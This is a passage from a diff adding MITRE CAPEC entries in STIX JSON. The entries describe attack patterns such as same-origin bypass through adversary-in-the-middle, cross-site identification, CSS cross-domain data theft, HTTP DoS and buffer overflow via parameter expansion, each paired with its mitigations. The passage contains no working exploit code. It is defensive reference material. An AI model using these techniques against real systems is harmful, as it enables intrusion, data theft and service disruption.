On the transparent proxy, disable the use of routing based on address information in the HTTP host header.", + "id": "course-of-action--d939e9ad-f3d3-4c25-8ec4-fd98a3ffed73", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-465-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9ac63888-5744-4d6d-adf1-0adf39beb786", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d939e9ad-f3d3-4c25-8ec4-fd98a3ffed73", + "target_ref": "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable in the browser the execution of Java Script, Flash, SilverLight, etc.", + "id": "course-of-action--e6df32f5-31e9-467d-bbd7-4146d1870ef4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-465-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--60c4dab5-4f4b-44f2-9098-04dc6db7b9a4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e6df32f5-31e9-467d-bbd7-4146d1870ef4", + "target_ref": "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages an adversary in the middle attack (CAPEC-94) in order to bypass the same origin policy protection in the victim's browser. This active adversary in the middle attack could be launched, for instance, when the victim is connected to a public WIFI hot spot. An attacker is able to intercept requests and responses between the victim's browser and some non-sensitive website that does not use TLS.", + "external_references": [ + { + "external_id": "CAPEC-466", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/466.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "description": "Roi Saltzman, Adi Sharabani, Active Man in the Middle Attacks, 2009--02---02, IBM Rational Application Security Group", + "external_id": "REF-403", + "source_name": "reference_from_CAPEC", + "url": "http://blog.watchfire.com/wfblog/2009/02/active-man-in-the-middle-attacks.html" + } + ], + "id": "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Leveraging Active Adversary in the Middle Attacks to Bypass Same Origin Policy", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n When an attacker intercepts a response bound to the victim, an attacker adds an iFrame (which is possibly invisible) to the response referencing some domain 
with sensitive functionality and forwards the response to the victim. The victim's browser than automatically initiates an unauthorized request to the site with sensitive functionality. The same origin policy would prevent making these requests to a site other than the one from which the Java Script came, but the attacker once again uses active adversary in the middle to intercept these automatic requests and redirect them to the domain / service with sensitive functionality. Any persistent cookies that the victim has in their browser would be used for these unauthorized requests. The attacker thus actively directs the victim to a site with sensitive functionality. When the site with sensitive functionality responds back to the victim's request, an active adversary in the middle attacker intercepts these responses, injects their own malicious Java Script into these responses, and forwards to the victim's browser. In the victim's browser, that Java Script executes under the restrictions of the site with sensitive functionality and can be used to continue to interact with the sensitive site. So an attacker can execute scripts within the victim's browser on any domains the attacker desires. The attacker is able to use this technique to steal cookies from the victim's browser for whatever site the attacker wants. This applies to both persistent cookies and HTTP only cookies (unlike traditional XSS attacks). An attacker is also able to use this technique to steal authentication credentials for sites that only encrypt the login form, but do not require a secure channel for the initial request to get to the page with the login form. Further the attacker is also able to steal any autocompletion information. This attack pattern can also be used to enable session fixation and cache poisoning attacks. 
Additional attacks can be enabled as well.\n ", + "x_capec_prerequisites": [ + "The victim and the attacker are both in an environment where an active adversary in the middle attack is possible (e.g., public WIFI hot spot)The victim visits at least one website that does not use TLS / SSL" + ], + "x_capec_skills_required": { + "Low": "Ability to intercept and modify requests / responses", + "Medium": "Solid understanding of the HTTP protocol" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Tunnel communications through a secure proxy", + "id": "course-of-action--d80b15df-ac31-4f96-a44b-854eae42d178", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-466-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ac76aec8-ae77-4b13-ae78-40f3c080cb27", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d80b15df-ac31-4f96-a44b-854eae42d178", + "target_ref": "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Trust level separation for privileged / non privileged interactions (e.g., two different browsers, two different users, two different operating systems, two different virtual machines)", + "id": "course-of-action--b3cd2e0b-e09e-426b-b06b-018ee62ab500", + "modified": 
"2022-02-22T00:00:00.000Z", + "name": "coa-466-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--27a38eca-f7d9-4b5e-b966-8e6d36a9dce2", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3cd2e0b-e09e-426b-b06b-018ee62ab500", + "target_ref": "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker harvests identifying information about a victim via an active session that the victim's browser has with a social networking site. A victim may have the social networking site open in one tab or perhaps is simply using the \"remember me\" feature to keep their session with the social networking site active. An attacker induces a payload to execute in the victim's browser that transparently to the victim initiates a request to the social networking site (e.g., via available social network site APIs) to retrieve identifying information about a victim. 
While some of this information may be public, the attacker is able to harvest this information in context and may use it for further attacks on the user (e.g., spear phishing).", + "external_references": [ + { + "external_id": "CAPEC-467", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/467.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Ronen, Cross Site Identification - or - How your social network might expose you when you least expect it, 2009--12---27", + "external_id": "REF-404", + "source_name": "reference_from_CAPEC", + "url": "http://blog.quaji.com/2009/12/out-of-context-information-disclosure.html" + } + ], + "id": "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross Site Identification", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker may post a malicious posting that contains an image with an embedded link. The link actually requests identifying information from the social networking site. A victim who views the malicious posting in their browser will have sent identifying information to the attacker, as long as the victim had an active session with the social networking site." + ], + "x_capec_extended_description": "\n There are many other ways in which the attacker may get the payload to execute in the victim's browser mainly by finding a way to hide it in some reputable site that the victim visits. 
The attacker could also send the link to the victim in an e-mail and trick the victim into clicking on the link. This attack is basically a cross site request forgery attack with two main differences. First, there is no action that is performed on behalf of the user aside from harvesting information. So standard CSRF protection may not work in this situation. Second, what is important in this attack pattern is the nature of the data being harvested, which is identifying information that can be obtained and used in context. This real time harvesting of identifying information can be used as a prelude for launching real time targeted social engineering attacks on the victim.\n ", + "x_capec_prerequisites": [ + "The victim has an active session with the social networking site." + ], + "x_capec_skills_required": { + "High": "An attacker should be able to create a payload and deliver it to the victim's browser.", + "Medium": "An attacker needs to know how to interact with various social networking sites (e.g., via available APIs) to request information and how to send the harvested data back to the attacker." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Users should always explicitly log out from the social networking sites when done using them.", + "id": "course-of-action--af4647f0-e80a-49ba-a16d-3c064e63c678", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-467-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--57332d9a-c39c-4f6b-b1ce-569f45f621b8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--af4647f0-e80a-49ba-a16d-3c064e63c678", + "target_ref": "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Users should not open other tabs in the browser when using a social networking site.", + "id": "course-of-action--8127e61d-3ccd-4866-bd76-59c159eeeefe", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-467-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5bb90021-f385-4a44-b27b-cecb4dfc0580", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + 
], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8127e61d-3ccd-4866-bd76-59c159eeeefe", + "target_ref": "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker makes use of Cascading Style Sheets (CSS) injection to steal data cross domain from the victim's browser. The attack works by abusing the standards relating to loading of CSS: 1. Send cookies on any load of CSS (including cross-domain) 2. When parsing returned CSS ignore all data that does not make sense before a valid CSS descriptor is found by the CSS parser.", + "external_references": [ + { + "external_id": "CAPEC-468", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/468.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "external_id": "CWE-149", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/149.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-838", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/838.html" + }, + { + "description": "Chris Evans, Generic cross-browser cross-domain theft, 2009--12---28", + "external_id": "REF-405", + "source_name": "reference_from_CAPEC", + "url": "http://scarybeastsecurity.blogspot.com/2009/12/generic-cross-browser-cross-domain.html" + } + ], + "id": "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Generic Cross-Browser Cross-Domain Theft", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ 
+ "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n By having control of some text in the victim's domain, the attacker is able to inject a seemingly valid CSS string. It does not matter if this CSS string is preceded by other data. The CSS parser will still locate the CSS string. If the attacker is able to control two injection points, one before the cross domain data that the attacker is interested in receiving and the other one after, the attacker can use this attack to steal all of the data in between these two CSS injection points when referencing the injected CSS while performing rendering on the site that the attacker controls. When rendering, the CSS parser will detect the valid CSS string to parse and ignore the data that \"does not make sense\". That data will simply be rendered. That data is in fact the data that the attacker just stole cross domain. The stolen data may contain sensitive information, such CSRF protection tokens.\n ", + "x_capec_prerequisites": [ + "No new lines can be present in the injected CSS stringProper HTML or URL escaping of the \" and ' characters is not presentThe attacker has control of two injection points: pre-string and post-string" + ], + "x_capec_resources_required": [ + "Attacker controlled site/page to render a page referencing the injected CSS string" + ], + "x_capec_skills_required": { + "High": "Ability to craft a CSS injection" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Prior to performing CSS parsing, require the CSS to start with well-formed CSS when it is a cross-domain load and the MIME type is broken. 
This is a browser level fix.", + "id": "course-of-action--ab470916-70bc-4ac8-8e6f-b924a0e868d5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-468-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2069c887-d975-4ee0-993c-8379a0d1af96", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab470916-70bc-4ac8-8e6f-b924a0e868d5", + "target_ref": "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform proper HTML encoding and URL escaping", + "id": "course-of-action--3b11fd1d-aa44-4c8f-a3ae-438fa37413a5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-468-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e3d2b93d-bd3c-47a7-a5fc-75b3c56d634b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b11fd1d-aa44-4c8f-a3ae-438fa37413a5", + "target_ref": "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker performs flooding at the HTTP level to bring down only a particular web application rather than anything listening on a TCP/IP connection. This denial of service attack requires substantially fewer packets to be sent which makes DoS harder to detect. This is an equivalent of SYN flood in HTTP. The idea is to keep the HTTP session alive indefinitely and then repeat that hundreds of times. This attack targets resource depletion weaknesses in web server software. The web server will wait to attacker's responses on the initiated HTTP sessions while the connection threads are being exhausted.", + "external_references": [ + { + "external_id": "CAPEC-469", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/469.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-772", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/772.html" + }, + { + "description": "Endpoint Denial of Service: Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + }, + { + "description": "Robert Hansen, Slowris HTTP DoS, 2009--06---17", + "external_id": "REF-406", + "source_name": "reference_from_CAPEC", + "url": "http://ha.ckers.org/blog/20090617/slowloris-http-dos/" + } + ], + "id": "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP DoS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6e3dda09-c1da-4f44-a0b3-e0e3b6fe0601" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "HTTP protocol is usedWeb server used is vulnerable to denial of 
service via HTTP flooding" + ], + "x_capec_resources_required": [ + "Ability to issues hundreds of HTTP requests" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Configure web server software to limit the waiting period on opened HTTP sessions", + "id": "course-of-action--cac35d87-f34b-428c-95aa-1e5963873af5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-469-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dd88d686-216c-4942-8543-341f79451457", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cac35d87-f34b-428c-95aa-1e5963873af5", + "target_ref": "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use load balancing mechanisms", + "id": "course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-469-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--37641472-3448-4011-b562-97904650273a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220", + "target_ref": "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack, the target software is given input that the adversary knows will be modified and expanded in size during processing. This attack relies on the target software failing to anticipate that the expanded data may exceed some internal limit, thereby creating a buffer overflow.", + "external_references": [ + { + "external_id": "CAPEC-47", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/47.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-130", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/130.html" + }, + { + "external_id": "CWE-131", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/131.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--e61f5dd9-d26e-454f-ab07-171f3dea6e73", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Buffer Overflow via Parameter Expansion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: FTP glob()\n The glob() function in FTP servers has been susceptible to attack as a result of incorrect resizing. This is an ftpd glob() Expansion LIST Heap Overflow Vulnerability. ftp daemon contains a heap-based buffer overflow condition. The overflow occurs when the LIST command is issued with an argument that expands into an oversized string after being processed by glob().\n This buffer overflow occurs in memory that is dynamically allocated. It may be possible for adversaries to exploit this vulnerability and execute arbitrary code on the affected host.\n To exploit this, the adversary must be able to create directories on the target host.\n The glob() function is used to expand short-hand notation into complete file names. 
By sending to the FTP server a request containing a tilde (~) and other wildcard characters in the pathname string, a remote adversary can overflow a buffer and execute arbitrary code on the FTP server to gain root privileges. Once the request is processed, the glob() function expands the user input, which could exceed the expected length. In order to exploit this vulnerability, the adversary must be able to create directories on the FTP server.\n [REF-1]See also: CVE-2001-0249", + "\n Buffer overflow in the glob implementation in libc in NetBSD-current before 20050914, and NetBSD 2.* and 3.* before 20061203, as used by the FTP daemon, allows remote authenticated users to execute arbitrary code via a long pathname that results from path expansion.\n The limit computation of an internal buffer was done incorrectly. The size of the buffer in byte was used as element count, even though the elements of the buffer are 2 bytes long. Long expanded path names would therefore overflow the buffer.See also: CVE-2006-6652" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

  2. Techniques
    In this attack, the normal method of providing large user input does not work. The program performs bounds checking on the user input, but not the expanded user input. The adversary needs to provide input that they believe will be expanded by the program to overflow a buffer. To identify where this is possible, an adversary either needs to have knowledge of the inner workings of the program or use a disassembler and other reverse engineering tools to guide the search.
  3. Craft overflow content: The adversary crafts the input to be given to the program. If the intent is to simply cause the software to crash, the input needs only to expand to an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft input that expands in a way that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.

  4. Techniques
    Create specific files and directories on the system and then give input using path traversal shortcuts to those directories that could expand past an input buffer.

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary gives the crafted input to the program, overflowing the buffer.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The program expands one of the parameters passed to a function with input controlled by the user, but a later function making use of the expanded parameter erroneously considers the original, not the expanded size of the parameter.", + "The expanded parameter is used in the context where buffer overflow may become possible due to the incorrect understanding of the parameter size (i.e. thinking that it is smaller than it really is)." + ], + "x_capec_resources_required": [ + "Access to the program source or binary. If the program is only available in binary then a disassembler and other reverse engineering tools will be helpful." + ], + "x_capec_skills_required": { + "High": "Finding this particular buffer overflow may not be trivial. Also, stack and especially heap based buffer overflows require a lot of knowledge if the intended goal is arbitrary code execution. Not only that the adversary needs to write the shell code to accomplish their goals, but the adversary also needs to find a way to get the program execution to jump to the planted shell code. There also needs to be sufficient room for the payload. So not every buffer overflow will be exploitable, even by a skilled adversary." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that when parameter expansion happens in the code that the assumptions used to determine the resulting size of the parameter are accurate and that the new size of the parameter is visible to the whole system", + "id": "course-of-action--f3dcafa1-68b1-4610-a489-f68adb1fcaed", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-47-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f17b6dc5-ba75-4137-8d20-e847c4934580", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f3dcafa1-68b1-4610-a489-f68adb1fcaed", + "target_ref": "attack-pattern--e61f5dd9-d26e-454f-ab07-171f3dea6e73", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. 
However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.", + "external_references": [ + { + "external_id": "CAPEC-470", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/470.html" + }, + { + "external_id": "CWE-250", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "description": "Bernardo Damele Assump ção Guimarães, Advanced SQL Injection to Operating System Full Control, 2009--04---10", + "external_id": "REF-408", + "source_name": "reference_from_CAPEC", + "url": "http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf" + } + ], + "id": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Expanding Control over the Operating System from the Database", + "object_marking_refs": [ + 